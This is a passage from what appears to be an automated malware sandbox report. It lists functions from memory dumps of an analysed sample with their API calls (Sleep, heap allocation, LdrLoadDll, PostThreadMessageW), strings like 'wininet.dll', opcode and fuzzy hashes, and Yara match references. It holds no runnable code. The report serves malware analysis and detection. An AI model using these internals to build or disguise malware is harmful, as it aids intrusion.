                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                      • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                      • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                      • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 025907AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                      • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                      • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                      • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0258FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                      • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                      • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                      • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0258FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                      • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                      • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                      • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0258FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                      • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                      • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                      • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0258FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                      • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                      • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                      • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0258FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                      • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                      • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                      • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0258FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                      • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                      • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                      • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0258F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                      • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                      • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                      • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0258F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                      • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                      • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                      • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0258FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                      • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                      • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                      • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0258FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                      • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                      • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                      • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0258FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                      • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                      • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                      • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0258FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                      • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                      • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                      • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0258FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                      • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                      • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                      • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000A9090, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 000A9138
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      • Opcode ID: 02f3b4d2928c7c566df143da585756ded651651eb2d623a4753e324fa4d4efdd
                                      • Instruction ID: fa91c5ccc115770621961957067327bdc420cade51a15a66fcba41ef5b31088e
                                      • Opcode Fuzzy Hash: 02f3b4d2928c7c566df143da585756ded651651eb2d623a4753e324fa4d4efdd
                                      • Instruction Fuzzy Hash: C33184B6600745BBC724DFA4C885FA7B7F8BB49B00F10851DF62A6B246DB70B550CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000A9089, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 000A9138
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      • Opcode ID: bdc1c7ee38170e1901dbfb4b710023cf5f40ada956a8e647feb0b32eb301ca7b
                                      • Instruction ID: 6c9a0b8b2a1d7a99f9d263de95e00fe963ab431fc3baa306db02d102a190297a
                                      • Opcode Fuzzy Hash: bdc1c7ee38170e1901dbfb4b710023cf5f40ada956a8e647feb0b32eb301ca7b
                                      • Instruction Fuzzy Hash: 8C2194B2A00201ABDB24DFA4C885FABB7F4FB89700F10811DF6296F246D775A550CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000AA672, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00093AF8), ref: 000AA6AD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: c2228c3a1741d68def62fa8a3cbf0f6062af880cba708a0a07a73eebb076bc35
                                      • Instruction ID: 13a1d05b5b8335535bbc6e995ae1c3167c321111485370622896c45f9d181b74
                                      • Opcode Fuzzy Hash: c2228c3a1741d68def62fa8a3cbf0f6062af880cba708a0a07a73eebb076bc35
                                      • Instruction Fuzzy Hash: DDE09AB6600204AFCB18EFA4DD88EE737A9EF88760F044559FD095B292C630E900CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000AA640, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(6E,?,000A4CAF,000A4CAF,?,000A4536,?,?,?,?,?,00000000,00000000,?), ref: 000AA66D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: 6E
                                      • API String ID: 1279760036-2994475630
                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction ID: 73bdb664f69e471437e247e598b1b4702f5545d24e59a463deeb9c45e47ad1d9
                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction Fuzzy Hash: 46E012B1200208ABDB18EF99CC41EA777ACAF88654F118558BA085B282C630F910CAB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000AA680, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00093AF8), ref: 000AA6AD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction ID: 114e9eb2bbb0bec9ae2018608eee28d91e3c0cc78abd8b7e718643e05dc11103
                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction Fuzzy Hash: CAE012B1200208ABDB18EF99CC49EA777ACAF88750F018558BA085B292C630E910CAB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0009830A, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009836A
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009838B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: dda4c1d86a00857a09575031e913dfb0291cb2a84426fe791074dc8bd483109a
                                      • Instruction ID: 819c3dbc57a401ee2c45d92f14e5ed45d1f78a9c9ea4bbd470b55d6de048370c
                                      • Opcode Fuzzy Hash: dda4c1d86a00857a09575031e913dfb0291cb2a84426fe791074dc8bd483109a
                                      • Instruction Fuzzy Hash: C501D831A802197AEB20D6949C43FFE776CAB41F51F054215FB04BA1C2DAA46A0647E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00098310, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009836A
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009838B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 6fa9e2466c940b1058e4d170af7c8c65c6e2faa198094bd898fc85c99061f236
                                      • Instruction ID: 8edc6710b314c7cae1d5775333a1445e6ac2910715860e903e446fea76c6ae49
                                      • Opcode Fuzzy Hash: 6fa9e2466c940b1058e4d170af7c8c65c6e2faa198094bd898fc85c99061f236
                                      • Instruction Fuzzy Hash: 7201DB31A8022877EB20A6949C03FFE776C5B41F50F054114FF04BA1C3EAD46A0547F6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0009ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0009AD62
                                      Memory Dump Source
